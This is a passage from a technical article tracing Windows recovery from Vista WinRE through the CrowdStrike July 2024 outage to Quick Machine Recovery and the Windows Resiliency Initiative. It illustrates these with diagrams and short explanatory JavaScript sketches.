Vista shipped a full GUI recovery environment built on the brand-new Windows PE 2.0 [@wiki-winpe]. winre.wim carried Startup Repair (a probe-and-fix playbook for boot failures), System Restore (now backed by the Volume Shadow Copy Service), Complete PC Restore, Windows Memory Diagnostic, and a command prompt for the cases nothing else fit. Vista was also the version that introduced the Boot Configuration Data store and bootmgr, replacing NTLDR and the plain-text boot.ini [@ms-bcd]. The same BCD that today still routes the recovery handoff was written for Vista. The Microsoft Learn "Vista WinRE Overview" page in the previous-versions archive (cc766056) is now misdirected and renders an unrelated USMT migration topic instead of the original article. The load-bearing claim that WinRE was introduced in Vista is independently supported by the Windows PE Wikipedia article's version table (WinPE 2.0 built from Vista RTM) and by Microsoft Learn's Push-button reset overview, which dates Push-Button Reset to Windows 8 and frames it as built on the existing WinRE architecture [@wiki-winpe, @ms-pbr-overview].

Vista WinRE had two architectural problems that the next generation fixed. OEMs were free to put winre.wim wherever they wanted on disk; there was no standard partition. And the install DVD remained the fallback for any user whose OEM had not pre-installed WinRE -- which, by 2010, was most users, none of whom still owned the DVD.

System Restore is itself a sub-thread worth noting. It first shipped in Windows ME (year 2000), was re-implemented atop VSS in Vista, and remains off by default on Windows 10 and 11 [@wiki-system-restore]. The Vista move made it callable from WinRE even when the host Windows would not boot -- a property that, twenty-five years after System Restore first shipped, Point-in-Time Restore is re-engineering for the cloud.

Generation 4: Recovery Partition + ReAgentC + BCD `recoverysequence` (Windows 7, 2009; standardised in Windows 8 and beyond)

This is the architecture every Windows 11 device still runs.

Windows 7 dropped winre.wim onto a dedicated recovery partition with a GPT Type ID that lets bootmgr find it without depending on the Windows volume's drive letter [@ms-uefi-gpt]. ReAgentC.exe became the in-box management tool [@ms-reagentc]. The BCD recoverysequence element became the mechanism by which the OS loader entry points at the WinRE entry. The two-failed-boots trigger entered the Windows RE Technical Reference's enumeration of automatic conditions [@ms-winre-tech-ref].

Generation 4 did not fail. The five auto-trigger conditions still fire on Windows 11 24H2. ReAgentC's switches are still the supported management surface. The recovery-partition GPT Type ID is still DE94BBA4-06D1-4D40-A16A-BFD50179D6AC. It is the architectural floor every later generation extends, including Quick Machine Recovery.

What Generation 4 did not solve was the cost of recovery at fleet scale. WinRE-on-disk handled one machine perfectly; it had nothing to say about ten thousand machines, each still bounded by the time it took to walk to a desk.

gantt
    dateFormat YYYY
    axisFormat %Y
    section Pre-WinRE
    Emergency Repair Disk (NT 3.x / 4.0) :1993, 2000
    Recovery Console (Windows 2000 onwards) :2000, 2008
    section WinRE
    WinRE on installation media (Vista) :2007, 2009
    Recovery partition + ReAgentC (still current) :2009, 2026
    section Recovery flavours
    Push-Button Reset (Windows 8 onwards) :2012, 2026
    Autopilot Reset (Win 10 1709) :2017, 2026
    Quick Machine Recovery (24H2) :2025, 2026
    Intune Remote Recovery / Cloud Rebuild :2025, 2026

A few parallel paths deserve naming. Push-Button Reset, introduced in Windows 8 in 2012, gave consumers an in-WinRE "Refresh" or "Reset"; image-less reset in Windows 10 and Cloud Download in Windows 10 version 2004 (May 2020) made the reset progressively less dependent on locally-staged install images [@ms-pbr-overview]. Autopilot Reset, shipped in Windows 10 1709 (October 2017), let Intune issue an MDM-initiated wipe-and-rebuild that preserved the device's Entra ID join. Microsoft Diagnostics and Recovery Toolset (DaRT) -- the descendant of Winternals ERD Commander acquired in 2006 and shipped under MDOP starting July 2007 (MDOP 2007), with subsequent releases through MDOP 2008 (April 2008) -- gave Software Assurance customers a richer enterprise tool on top of WinPE [@wiki-mdop-dart]. Older recovery mechanisms quietly aged out: Last Known Good Configuration was no longer the default boot-failure response on Windows 8 onward, and the deprecated-features lifecycle framework is the canonical place to track such retirements today [@ms-deprecated].

By the early 2010s, the architecture that still runs on every Windows 11 device today was largely in place [@ms-winre-tech-ref, @ms-reagentc]. None of these tools gave WinRE permission to call Windows Update from inside the recovery environment. That gap is the next chapter.

5. The Forcing Function: July 19, 2024

We know what WinRE is. We know how it boots. We can now see the CrowdStrike incident as the architecture's stress test. The headline numbers are well-rehearsed at this point; what matters here is the technical cause, the kernel-resident dependency it expressed, and the procedure Microsoft published.

The fault

CrowdStrike's Falcon sensor for Windows version 7.11, released in February 2024, introduced a new IPC Template Type used by behavioural detection logic [@crowdstrike-rca-pdf]. The Template Type declared twenty-one input parameter fields. The integration code that invoked the in-driver Content Interpreter to evaluate Template Instances against host activity supplied only twenty inputs [@crowdstrike-rca-pdf]. For more than four months, Channel File 291 contained no Template Instance whose criterion read the twenty-first field. That made the mismatch latent.

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 containing a Template Instance that referenced the twenty-first field with a non-wildcard matching criterion [@crowdstrike-rca-pdf, @crowdstrike-tech-details]. The Content Interpreter loaded the instance, looked up the twenty-first input pointer in its input-pointer array, and read past the end of that array. Sensors running 7.11 or later that received the update between 04:09 and 05:27 UTC tripped the latent out-of-bounds read [@crowdstrike-tech-details].
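The latent-then-fatal dynamic is easier to see in miniature. The model below is a simplified sketch, not CrowdStrike's code: the evaluate function, the wildcard marker, and the sample values are hypothetical. It keeps only the two numbers the RCA reports, twenty-one declared fields and twenty supplied inputs. JavaScript would quietly return undefined for an out-of-range index, so the sketch throws explicitly at the point where native code read past the end of the array.

```javascript
const DECLARED_FIELDS = 21; // fields the Template Type declares
const SUPPLIED_INPUTS = 20; // inputs the integration code actually passes
const WILDCARD = '*';       // hypothetical marker for "match anything"

// Evaluate one Template Instance against the supplied inputs.
function evaluate(instance, inputs) {
  for (let i = 0; i < instance.criteria.length; i++) {
    const criterion = instance.criteria[i];
    if (criterion === WILDCARD) continue; // wildcard: the input is never read
    if (i >= inputs.length) {
      // Stand-in for the native out-of-bounds read that page-faulted.
      throw new RangeError('out-of-bounds read at input index ' + i);
    }
    if (inputs[i] !== criterion) return false;
  }
  return true;
}

const inputs = Array.from({ length: SUPPLIED_INPUTS }, (_, i) => 'value' + i);

// Earlier instances: no criterion reads the twenty-first field.
const latent = { criteria: Array(DECLARED_FIELDS).fill(WILDCARD) };

// July 19 instance: a non-wildcard criterion on the twenty-first field.
const fatal = {
  criteria: [...Array(DECLARED_FIELDS - 1).fill(WILDCARD), 'specific-value'],
};

console.log(evaluate(latent, inputs)); // the mismatch stays latent
try {
  evaluate(fatal, inputs);
} catch (err) {
  console.log(err.message); // index 20 is the twenty-first input
}
```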

The crash

Microsoft's Windows Error Reporting analysis, published in the security blog on July 27, 2024, recorded the global crash signature as nt!KeBugCheckEx followed by nt!KiPageFault and then csagent+0xe14ed, with r8=ffff840500000074 as the invalid pointer that the read tried to dereference [@ms-security-jul27]. Microsoft confirmed that the analysis matched CrowdStrike's own conclusion: a read-out-of-bounds memory safety error in the csagent.sys driver.

flowchart TD
    A[Falcon 7.11 ships in Feb 2024 with IPC Template Type declaring 21 fields] --> B[Integration code supplies only 20 inputs]
    B --> C[Latent OOB potential -- no instance references field 21]
    C --> D[July 19 04:09 UTC: new Channel File 291 adds non-wildcard 21st-field criterion]
    D --> E[Content Interpreter reads input-pointer index 20]
    E --> F[Page fault at csagent+0xe14ed]
    F --> G[nt!KiPageFault -> nt!KeBugCheckEx]
    G --> H[Bug check; system reboots]
    H --> I[csagent.sys reloads -- registered SERVICE_SYSTEM_START Start=1 -- bug check again]
    I --> J[Boot loop on 8.5 million endpoints]

The kernel-resident dependency

csagent.sys loaded early in boot. Microsoft's WER post-mortem shows the driver registered with REG_DWORD Start 1 -- the SERVICE_SYSTEM_START class, loaded by the kernel before user-mode comes up [@ms-security-jul27]. That placement is the entire point of a kernel-mode security agent: it has to instrument the kernel boundary at the moment user-mode would otherwise be invisible to it. The cost of that placement is that when an early-boot driver page-faults, the bug check happens before the operating system is interactive. The remediation -- delete C-00000291*.sys -- could not be issued from a running Windows, because there was no running Windows.
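For readers who do not carry the service start classes in their heads, the registry Start value maps onto five named constants. The lookup below is a small sketch; describeStart and the loadsBeforeUserMode flag are hypothetical helpers added for illustration, and the flag is a simplification of the boot sequence.

```javascript
// Start values for a service or driver under
// HKLM\SYSTEM\CurrentControlSet\Services\<name>.
const SERVICE_START = {
  0: 'SERVICE_BOOT_START',   // loaded by the boot loader
  1: 'SERVICE_SYSTEM_START', // loaded during kernel initialisation
  2: 'SERVICE_AUTO_START',   // started by the service control manager
  3: 'SERVICE_DEMAND_START', // started on request
  4: 'SERVICE_DISABLED',
};

function describeStart(value) {
  const name = SERVICE_START[value];
  if (!name) throw new RangeError('unknown Start value: ' + value);
  // Simplification: boot-start and system-start drivers come up before any
  // user-mode process can run a remediation script.
  return { name, loadsBeforeUserMode: value <= 1 };
}

console.log(describeStart(1));
```

A driver at Start 0 or 1 that faults on load leaves no window in which a running Windows could receive and apply a fix.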

The fault dynamic above is easier to describe than it is to file. CrowdStrike's own technical-details post is explicit about the file-type distinction: "Although Channel Files end with the SYS extension, they are not kernel drivers" [@crowdstrike-tech-details]. The kernel-mode component is `csagent.sys`. The Channel Files in `C:\Windows\System32\drivers\CrowdStrike\` are *data* that the Content Interpreter inside `csagent.sys` reads. The fault was a bug in `csagent.sys`'s interpretation of a particular Channel File; both ends matter, and the file extension on the data file is incidental.

The recovery procedure

Microsoft published KB5042421 within hours [@ms-kb5042421]. The text reduced to three steps: boot to Safe Mode (which on Windows 11 means letting WinRE select Safe Mode from the Advanced startup options tree); delete C:\Windows\System32\drivers\CrowdStrike\C-00000291*.sys; reboot. For BitLocker-encrypted volumes the procedure had a fourth, preliminary step: surface the recovery key. KB5042421 walks the user through the Entra ID self-service flow at aka.ms/aadrecoverykey: log on from a phone, choose Manage Devices, View BitLocker Keys, Show recovery key [@ms-kb5042421].

The instruction was correct. It was also unambiguously per-machine.

We currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines. -- Microsoft, *Helping our customers through the CrowdStrike outage*, July 20, 2024 [@ms-crowdstrike-jul20].

The bottleneck

Each device's recovery was a function of time-to-physical-access, plus time-to-BitLocker-key, plus time-to-keyboard. None of those terms scaled. A laptop on a desk that the owner happened to be near recovered in five minutes. A laptop on a desk where the owner was on holiday recovered when someone arrived to swipe their badge. A server in a remote data centre recovered when a hand reached the iLO or KVM. A point-of-sale device in a checked-bag-only baggage hall recovered when someone wheeled a USB keyboard out to it. Multiply by 8.5 million.
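The multiplication is worth doing once. The sketch below uses the best-case five minutes per device from the example above and assumes an eight-hour working day; both inputs are illustrative, and real per-device times were far longer for unattended or remote machines. The function names are hypothetical.

```javascript
// Per-device time is the sum of three terms, none of which scales.
function deviceMinutes({ physicalAccess, bitLockerKey, keyboard }) {
  return physicalAccess + bitLockerKey + keyboard;
}

// Fleet labour in person-days, assuming every device needs hands-on work.
function fleetPersonDays(devices, minutesPerDevice, hoursPerDay = 8) {
  return (devices * minutesPerDevice) / 60 / hoursPerDay;
}

// Best case: owner at the desk, key to hand (assumed split of five minutes).
const bestCase = deviceMinutes({ physicalAccess: 0, bitLockerKey: 2, keyboard: 3 });
const personDays = fleetPersonDays(8.5e6, bestCase);

console.log(bestCase + ' minutes per device');
console.log(Math.round(personDays) + ' person-days across the fleet');
```

Even at the five-minute floor, the total is tens of thousands of person-days, which is why the per-device terms matter more than the fix itself.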

The architecture that delivered Safe Mode to every one of those devices did exactly what its 2009 specification said it would do. The architecture that delivered Safe Mode to every one of those devices left enterprises stranded for days. Both sentences are true. The contradiction is the whole point.

Note: WinRE booted correctly. The Safe Mode tile rendered. The two-failed-boots trigger fired. The recovery partition was where it should be. The BCD recoverysequence led to the right winre.wim. The keyboard handler took keystrokes. Every line of code did what it was specified to do. The single unwritten line of the specification -- one operator, please -- was the line that did not scale.

The instruction was correct, the procedure was published within hours, and the floor was on fire for days. The next question -- the one Microsoft was already being asked at WESES, the closed-door September 10, 2024 endpoint-security partner summit [@ms-weses] -- was whether the floor could not be on fire next time.

6. The Breakthrough: Quick Machine Recovery

Quick Machine Recovery, announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024] and generally available on Windows 11 24H2 build 26100.4700+ in August 2025 per the November 18, 2025 update [@ms-wri-ignite-2025], did not add any new technology to WinRE that had not been in WinPE since 2002. Networking drivers, DHCP clients, HTTPS stacks: all of these were already in winre.wim's base image, inherited from the WinPE Optional Components that have shipped with the OS for two decades [@ms-winpe-intro]. What QMR added was an answer to a question WinRE had never been asked: when you are inside the recovery environment with no operator at the keyboard, who do you call?

Quick Machine Recovery (QMR). The Windows 11 24H2 feature, available on build 26100.4700 or later, that lets WinRE establish network connectivity from inside the recovery environment, query Windows Update for a remediation matching the current failure signature, download and apply that remediation, and reboot -- all without requiring an operator at the keyboard [@ms-qmr]. Announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024]; first shipped in Windows 11 Insider Preview build 26120.3653 on March 28, 2025 [@ms-qmr-insider-mar2025]; generally available in August 2025 [@ms-wri-ignite-2025].

The five-phase loop

Microsoft Learn documents QMR as five phases [@ms-qmr]:

Crash detection. The same two-failed-boots trigger already in the Windows RE Technical Reference [@ms-winre-tech-ref] fires the recovery path.
Boot to recovery. The existing BCD recoverysequence mechanism from Section 3 routes the system into WinRE.
Network connection. WinRE establishes wired Ethernet, or WPA/WPA2 password-based Wi-Fi using a credential pre-staged via reagentc.exe /SetRecoverySettings. As of the Microsoft Learn page's current wording, only wired and WPA/WPA2 password-based wireless are supported [@ms-qmr]; enterprise certificates and WPA3-Enterprise are on the November 18, 2025 roadmap but not yet shipped [@ms-wri-ignite-2025].
Remediation. The recovery environment scans Windows Update for a published remediation matching the device's failure signature, downloads it, and applies it.
Reboot. On success, the device boots normally. On no-match, the device can either present the manual recovery menu (the one-time scan mode, the default for unmanaged systems) or loop with a configurable interval (the looped mode) until either a remediation arrives or the operator-set total wait time expires [@ms-qmr].

sequenceDiagram
    participant D as Device (OS)
    participant W as WinRE
    participant N as Network
    participant WU as Windows Update
    participant O as OS partition
    D->>W: Two failed boots -> follow recoverysequence
    W->>N: Acquire Ethernet or WPA2 Wi-Fi
    W->>WU: Query for remediation matching failure signature
    WU-->>W: Remediation package (or "none found")
    alt Remediation available
        W->>O: Apply remediation to OS partition
        W->>D: Reboot
        D-->>D: Normal boot succeeds
    else None found, one-time mode
        W->>D: Present manual recovery menu
    else None found, looped mode
        W-->>W: Sleep wait_interval, retry until total_wait_time
    end

The default-on/off matrix

The Microsoft Learn QMR page is explicit on defaults [@ms-qmr]. Cloud remediation is enabled by default, with one-time scan auto-remediation, on systems that are not under enterprise management -- Windows Home and unmanaged Pro. It is disabled by default on enterprise-managed systems -- Windows Enterprise, Education, and managed Pro. The rationale follows from how those populations think: enterprise administrators want to gate cloud remediation behind their own deployment-ring process, and consumers benefit from the default-on behaviour because they do not have a ring process at all. The same Microsoft Learn page documents an Intune Settings Catalog policy under Remote Remediation > Enable Cloud Remediation for administrators who want to switch the policy on at the tenant level [@ms-qmr].
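The matrix reduces to a two-input function. This is a sketch of the defaults as described above, not of any Microsoft API: cloudRemediationDefault and its edition and managed parameters are hypothetical names, and an administrator's policy can override either result.

```javascript
// Default QMR cloud-remediation state by edition and management status.
function cloudRemediationDefault({ edition, managed }) {
  const enterpriseEdition = edition === 'Enterprise' || edition === 'Education';
  const underManagement = enterpriseEdition || (edition === 'Pro' && managed);
  return underManagement
    ? { cloudRemediation: false, autoRemediation: null }
    : { cloudRemediation: true, autoRemediation: 'one_time' };
}

console.log(cloudRemediationDefault({ edition: 'Home', managed: false }));
console.log(cloudRemediationDefault({ edition: 'Pro', managed: true }));
```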

The test-mode flow

QMR ships with a dry-run mechanism. reagentc.exe /SetRecoveryTestmode configures the WinRE entry for a simulated recovery cycle; reagentc.exe /BootToRe triggers the cycle on the next reboot; the simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS [@ms-qmr]. Microsoft suggests using the test mode to validate the per-device QMR configuration before relying on it in production.

The pseudocode

The five phases collapse into a short loop. The version below is paraphrased from the Microsoft Learn QMR page [@ms-qmr] and shows how the two settings interact.

{`
// Paraphrased from the Microsoft Learn QMR specification.

const config = {
  cloud_remediation_enabled: true, // default on Home/unmanaged Pro
  auto_remediation_mode: 'looped', // 'one_time' | 'looped'
  total_wait_time_minutes: 60,
  wait_interval_minutes: 10,
  wifi: { ssid: 'corp-recovery', psk: '***', encryption: 'WPA2' },
};

function detectFailureSignature() {
  return { driver: 'csagent.sys', offset: '0xe14ed', signature: 'oob-read' };
}

function scanWindowsUpdate(signature) {
  if (signature.driver === 'csagent.sys' && signature.signature === 'oob-read') {
    return {
      id: 'qmr-csagent-291',
      action: 'delete',
      path: 'C:\\Windows\\System32\\drivers\\CrowdStrike\\C-00000291*.sys',
    };
  }
  return null;
}

function qmrEnterRecovery() {
  console.log('Phase 1: crash detected (two failed boots)');
  console.log('Phase 2: booted into WinRE via BCD recoverysequence');

  if (!config.cloud_remediation_enabled) {
    console.log('Cloud remediation disabled; falling back to Startup Repair');
    return;
  }

  console.log('Phase 3: acquiring network (' + config.wifi.encryption + ' Wi-Fi)');
  const sig = detectFailureSignature();
  let elapsed = 0;

  while (true) {
    console.log('Phase 4: scanning Windows Update for remediation matching ' + sig.driver);
    const remediation = scanWindowsUpdate(sig);
    if (remediation) {
      console.log(' -> Applying ' + remediation.id + ' (delete ' + remediation.path + ')');
      console.log('Phase 5: reboot into repaired Windows');
      return;
    }
    if (config.auto_remediation_mode === 'one_time') {
      console.log('No remediation found; presenting manual recovery menu');
      return;
    }
    elapsed += config.wait_interval_minutes;
    if (elapsed >= config.total_wait_time_minutes) {
      console.log('Looped mode exhausted; falling back to manual recovery menu');
      return;
    }
    console.log(' -> No match; sleeping ' + config.wait_interval_minutes + ' min');
  }
}

qmrEnterRecovery();
`}

The counterfactual

Had QMR existed on July 19, 2024, the per-device labour would have been zero. Microsoft and CrowdStrike would have published a Windows Update remediation that deletes C-00000291*.sys; every affected device would have entered WinRE on its second failed boot, picked up the remediation, applied it, and rebooted. The 8.5-million-device fleet cost would have collapsed from operator-days to network-minutes. The CrowdStrike RCA published August 6, 2024 documents that the fault-to-rollback time was 78 minutes [@crowdstrike-tech-details, @crowdstrike-rca-pdf]; QMR would have made time-to-rollback and time-to-fleet-recovery the same number, plus the per-device Windows Update transit. That is the empirical case Microsoft is making.

Key idea: Quick Machine Recovery did not add new technology to WinRE. It added a question. WinRE has always had networking drivers; it had never been told it had permission to phone home. The technical innovation is policy, not code -- the Windows Update endpoint framing is a commitment that the recovery environment may, in well-defined circumstances, act on behalf of the operator who is not there.

QMR re-priced the per-device cost of recovery from O(N) to roughly O(1). But QMR alone does not explain why Microsoft is calling this the Windows Resiliency Initiative rather than the Quick Machine Recovery Release. The next section unpacks the five layers WRI puts around QMR.
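The O(N)-versus-O(1) claim can be made concrete with a toy cost model. This is a sketch under stated assumptions: the minutes-per-device and authoring-time figures are hypothetical placeholders, not numbers published by Microsoft or CrowdStrike, and only the 8.5-million device count comes from the text above.

```javascript
// Toy model of operator labour in a fleet-down event.
// All timing inputs are hypothetical; only the shape of the two curves matters.

// Manual recovery: a technician touches every device, so labour grows with N.
function manualOperatorMinutes(deviceCount, minutesPerDevice) {
  return deviceCount * minutesPerDevice;
}

// QMR-style recovery: the remediation is authored and published once;
// devices then fetch it from WinRE without an operator present.
function qmrOperatorMinutes(deviceCount, authoringMinutes) {
  return deviceCount > 0 ? authoringMinutes : 0;
}

const fleet = 8500000;               // device count cited for July 19, 2024
const assumedMinutesPerDevice = 15;  // assumption: one Safe Mode visit per device
const assumedAuthoringMinutes = 120; // assumption: author and publish one remediation

const manual = manualOperatorMinutes(fleet, assumedMinutesPerDevice);
const qmr = qmrOperatorMinutes(fleet, assumedAuthoringMinutes);

console.log('manual: ' + Math.round(manual / 60 / 8) + ' operator-days (8-hour days)');
console.log('qmr:    ' + qmr + ' operator-minutes, independent of fleet size');
```

Doubling `fleet` doubles the first figure and leaves the second unchanged, which is the whole argument in two lines.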

7. The Program: The Windows Resiliency Initiative as Five Layers

WRI is not one feature. It is a layered program. Each layer is a Microsoft-named deliverable with a Microsoft-cited source. The temptation, on reading any single WRI blog post, is to confuse the layer with the program. The layers are concentric. They are also dated.

Walk the five layers. Each has a Microsoft term, a primary anchor, and a published status as of November 18, 2025.

| Layer | Microsoft term | Anchor | Status as of Nov 18, 2025 |
| --- | --- | --- | --- |
| Prevent: stop bad updates leaving the partner | Safe Deployment Practices (SDP), part of MVI 3.0 | [@ms-wri-ignite-2024], [@ms-mvi], [@ms-wri-jun-2025] | Effective April 1, 2025 [@ms-wri-ignite-2025] |
| Prevent: stop bad code being kernel-resident | Windows endpoint security platform (user-mode antivirus) | [@ms-wri-ignite-2024], [@ms-wri-jun-2025], [@ms-wri-ignite-2025] | Private preview July 2025; named partners in [@ms-wri-jun-2025] |
| Manage: see the incident at scale | Intune surfaces WinRE state; Mission Critical Services for Windows | [@ms-wri-ignite-2025] | Coming soon |
| Recover: heal the unbootable machine | Quick Machine Recovery | [@ms-wri-ignite-2024], [@ms-qmr], [@ms-wri-ignite-2025] | GA August 2025 |
| Recover: rebuild without shipping hardware | Point-in-Time Restore, Cloud Rebuild, Windows 365 Reserve | [@ms-wri-ignite-2025] | PITR Insider preview Nov 2025; W365R GA; Cloud Rebuild coming |

flowchart LR
  subgraph L1[1. Prevent: stop bad updates at the partner -- MVI 3.0 SDP]
    subgraph L2[2. Prevent: stop bad code being kernel-resident -- user-mode AV platform]
      subgraph L3[3. Manage: see the incident at scale -- Intune surfaces WinRE state]
        subgraph L4[4. Recover the unbootable: Quick Machine Recovery]
          subgraph L5[5. Rebuild without shipping hardware: PITR / Cloud Rebuild / W365 Reserve]
            CORE[Windows endpoint -- recoverable at fleet scale]
          end
        end
      end
    end
  end

Layer 1: Safe Deployment Practices and MVI 3.0

Microsoft Virus Initiative 3.0 became effective on April 1, 2025 [@ms-wri-ignite-2025]. Membership now requires partners to commit to four named obligations [@ms-mvi]: a signed nondisclosure agreement; use of Microsoft Trusted Signing (the hosted descendant of Authenticode) for AV/EDR driver code-signing; documented Safe Deployment Practices for content updates (gradual rollouts with deployment rings and monitoring); and certification within the last 12 months by at least one of AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, or West Coast Labs [@ms-mvi]. The June 26, 2025 WRI update lists eight named partner endorsements -- Bitdefender (Florin Virlan), CrowdStrike (Alex Ionescu), ESET (Juraj Malcho), SentinelOne (Stefan Krantz), Sophos (John Peterson), Trellix (Jim Treinen), Trend Micro (Rachel Jin), and WithSecure (Johannes Rave) -- and the November 18, 2025 update confirms the effective date verbatim: "Effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners to maintain signing rights for Windows AV drivers" [@ms-wri-jun-2025, @ms-wri-ignite-2025].

Microsoft Virus Initiative (MVI): Microsoft's program for third-party antivirus and endpoint detection vendors that ship products on Windows. MVI 3.0, effective April 1, 2025, adds Safe Deployment Practices, mandatory Trusted Signing, NDA, and 12-month independent test-lab certification as preconditions to maintain Windows AV driver signing rights [@ms-mvi, @ms-wri-ignite-2025].

The model is structurally identical to the canary / progressive-rollout pattern formalised in the Google SRE Book chapter on Release Engineering: hermetic builds, multiple deployment rings, gated promotion between rings, "Push on Green", and the option to cherry-pick at the same revision when a critical change is needed mid-cycle [@sre-release-eng]. MVI 3.0 is not a Microsoft invention; it is a Microsoft mandate of a model that has been industry practice for two decades. The mandate is what is new.
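A minimal sketch of gated promotion between rings shows why the pattern bounds blast radius. The ring names, ring sizes, and crash-rate threshold are hypothetical; MVI 3.0 requires documented Safe Deployment Practices but the sources cited here do not prescribe these values.

```javascript
// Sketch of gated promotion across deployment rings.
// Ring names, sizes, and the crash-rate threshold are hypothetical.

const rings = [
  { name: 'internal', devices: 100 },
  { name: 'canary', devices: 10000 },
  { name: 'broad', devices: 1000000 },
];

// observeCrashRate stands in for real telemetry: it returns the fraction of
// devices in a ring that crashed after receiving the update.
function rollOut(update, observeCrashRate, maxCrashRate = 0.001) {
  let exposed = 0;
  for (const ring of rings) {
    exposed += ring.devices;
    const crashRate = observeCrashRate(update, ring);
    if (crashRate > maxCrashRate) {
      // Gate closed: the update never reaches the later rings.
      return { status: 'halted', haltedAt: ring.name, exposed };
    }
  }
  return { status: 'promoted', haltedAt: null, exposed };
}

// A content update that crashes every device it touches, and one that crashes none.
const faulty = rollOut('content-update-A', () => 1.0);
const healthy = rollOut('content-update-B', () => 0.0);
console.log(faulty);
console.log(healthy);
```

In this toy fleet the faulty update is stopped after the first ring, so the number of exposed devices is the size of that ring rather than the size of the fleet.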

Layer 2: The Windows endpoint security platform

The same November 19, 2024 keynote committed to a Windows endpoint security platform that lets partners ship their detection logic outside kernel mode, with a private preview promised to security-partner programs by July 2025 [@ms-wri-ignite-2024]. The June 26, 2025 update confirmed the date with named partner endorsements [@ms-wri-jun-2025]. The architectural premise is the one BSOD survivors recognise immediately: a faulty user-mode component can be killed by Task Manager; a faulty kernel-mode driver bug-checks the system.

Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft, *Preparing for what's next*, November 18, 2025 [@ms-wri-ignite-2025].

Microsoft is careful to frame WRI as a floor-raiser, not a kernel ban. The November 18, 2025 update enumerates the driver-resiliency playbook for the surfaces that will remain in kernel mode: mandatory compiler safeguards (control-flow integrity, CFG, stack canaries), driver isolation, DMA-remapping, a higher signing bar, and expanded in-box Microsoft drivers and APIs that third parties can call rather than reimplementing [@ms-wri-ignite-2025]. The argument is that the kernel surface that must exist (graphics, storage, some networking) should be smaller, better isolated, and equipped with mitigations that contain a single fault.

The June 2025 partner roster is the most pointed piece of evidence that the user-mode direction predates and outlasts the July 2024 incident. CrowdStrike itself is named [@ms-wri-jun-2025]. The vendor that started the chain reaction is publicly endorsing the architectural concession the chain reaction priced into existence.

The Windows Resiliency Initiative is not Microsoft's only post-2023 security program. The umbrella is the *Secure Future Initiative* (SFI), announced in November 2023 as the company-wide response to identity-based attacks on Microsoft itself. WRI is the workstream inside SFI that owns Windows availability, kernel resilience, and the recovery path; SFI also owns identity hardening, supply-chain controls, and engineering culture changes. Microsoft's published WRI blogs explicitly frame the recoverability program as "the Windows pillar of our Secure Future Initiative", not as a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

Layer 3: Intune-surfaced WinRE state

The November 18, 2025 update names a new Intune signal: "Intune will surface when a Windows device has booted into the Windows Recovery Environment (WinRE)" [@ms-wri-ignite-2025]. The same signal will appear in the Azure Portal for Windows Server VMs that switched into WinRE. The same update introduces a WinRE plug-in model: IT administrators can push custom recovery scripts through Intune, with the model documented as third-party-MDM-adoptable. Both are "coming soon" as of that announcement [@ms-wri-ignite-2025].

The architectural insight here is that Microsoft-pushed remediations (QMR) and administrator-pushed remediations (Intune scripts) must be expressible against the same WinRE surface, with Intune providing the visibility and audit layer.
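As an illustration of that visibility layer, the sketch below computes a fleet roll-up from a per-device boot-state signal. The record shape (`bootState`, `pendingRemediation`) is a hypothetical stand-in; it is not an Intune or Microsoft Graph schema, which had not been published at the time of the announcement.

```javascript
// Sketch of a fleet roll-up built on a "device is in WinRE" signal.
// The record shape is hypothetical, not an Intune API.

function summariseBootState(devices) {
  const summary = { total: devices.length, inWinRE: [], byRemediationSource: {} };
  for (const d of devices) {
    if (d.bootState !== 'winre') continue;
    summary.inWinRE.push(d.id);
    // 'microsoft' = QMR remediation; 'admin' = administrator-pushed script.
    const source = d.pendingRemediation ?? 'none';
    summary.byRemediationSource[source] = (summary.byRemediationSource[source] ?? 0) + 1;
  }
  return summary;
}

const sample = [
  { id: 'LT-001', bootState: 'os', pendingRemediation: null },
  { id: 'LT-002', bootState: 'winre', pendingRemediation: 'microsoft' },
  { id: 'LT-003', bootState: 'winre', pendingRemediation: 'admin' },
  { id: 'LT-004', bootState: 'winre', pendingRemediation: null },
];

const s = summariseBootState(sample);
console.log(s.inWinRE.length + ' of ' + s.total + ' devices are in WinRE', s.byRemediationSource);
```

Grouping by remediation source is the point of the shared surface: both kinds of fix show up in one audit view.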

Layer 4: Quick Machine Recovery

Already covered in Section 6. Status: GA August 2025 on Windows 11 24H2 build 26100.4700+ [@ms-qmr, @ms-wri-ignite-2025]. Autopatch QMR management is in preview at the November 2025 announcement [@ms-wri-ignite-2025].

Layer 5: Rebuild without shipping hardware

The November 18, 2025 update introduces three Microsoft-cloud-side recovery actions [@ms-wri-ignite-2025]:

Point-in-Time Restore (PITR). Cloud-orchestrated rollback to an earlier point-in-time snapshot of the device's full state. Status: available in the Windows Insider preview build the week of the announcement.
Cloud Rebuild. Intune-portal-triggered clean OS reimage using Autopilot for zero-touch provisioning, with user data and settings restored from OneDrive and Windows Backup for Organizations. Status: coming.
Windows 365 Reserve. A temporary Cloud PC for users whose endpoint is unusable. Status: generally available.

Each of these targets a scenario QMR cannot fix. PITR addresses regressions that the user-mode WU pipeline cannot patch back -- driver downgrades that need to roll back state, not push a new patch. Cloud Rebuild addresses devices whose local Windows is genuinely beyond surgical repair. Windows 365 Reserve addresses the productivity gap while the local device is being recovered.
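The division of labour can be written down as a runbook decision. This is a sketch only: the triage flags (`boots`, `needsStateRollback`, and so on) are hypothetical questions an operator might answer, not fields Microsoft defines, and the ordering is one reasonable reading of the paragraph above.

```javascript
// Sketch of a runbook decision: which recovery action fits which failure.
// The triage flags are hypothetical; the action names come from the list above.

function chooseRecoveryAction(device) {
  let repair;
  if (!device.osRepairable) {
    repair = 'Cloud Rebuild';              // local Windows is beyond surgical repair
  } else if (device.needsStateRollback) {
    repair = 'Point-in-Time Restore';      // state must roll back, not be patched forward
  } else if (!device.boots && device.targetedFixPublished) {
    repair = 'Quick Machine Recovery';     // unbootable, and a targeted fix exists
  } else {
    repair = 'manual triage';
  }
  // A temporary Cloud PC bridges the gap while the local device is being repaired.
  const bridge = device.userBlocked ? 'Windows 365 Reserve' : null;
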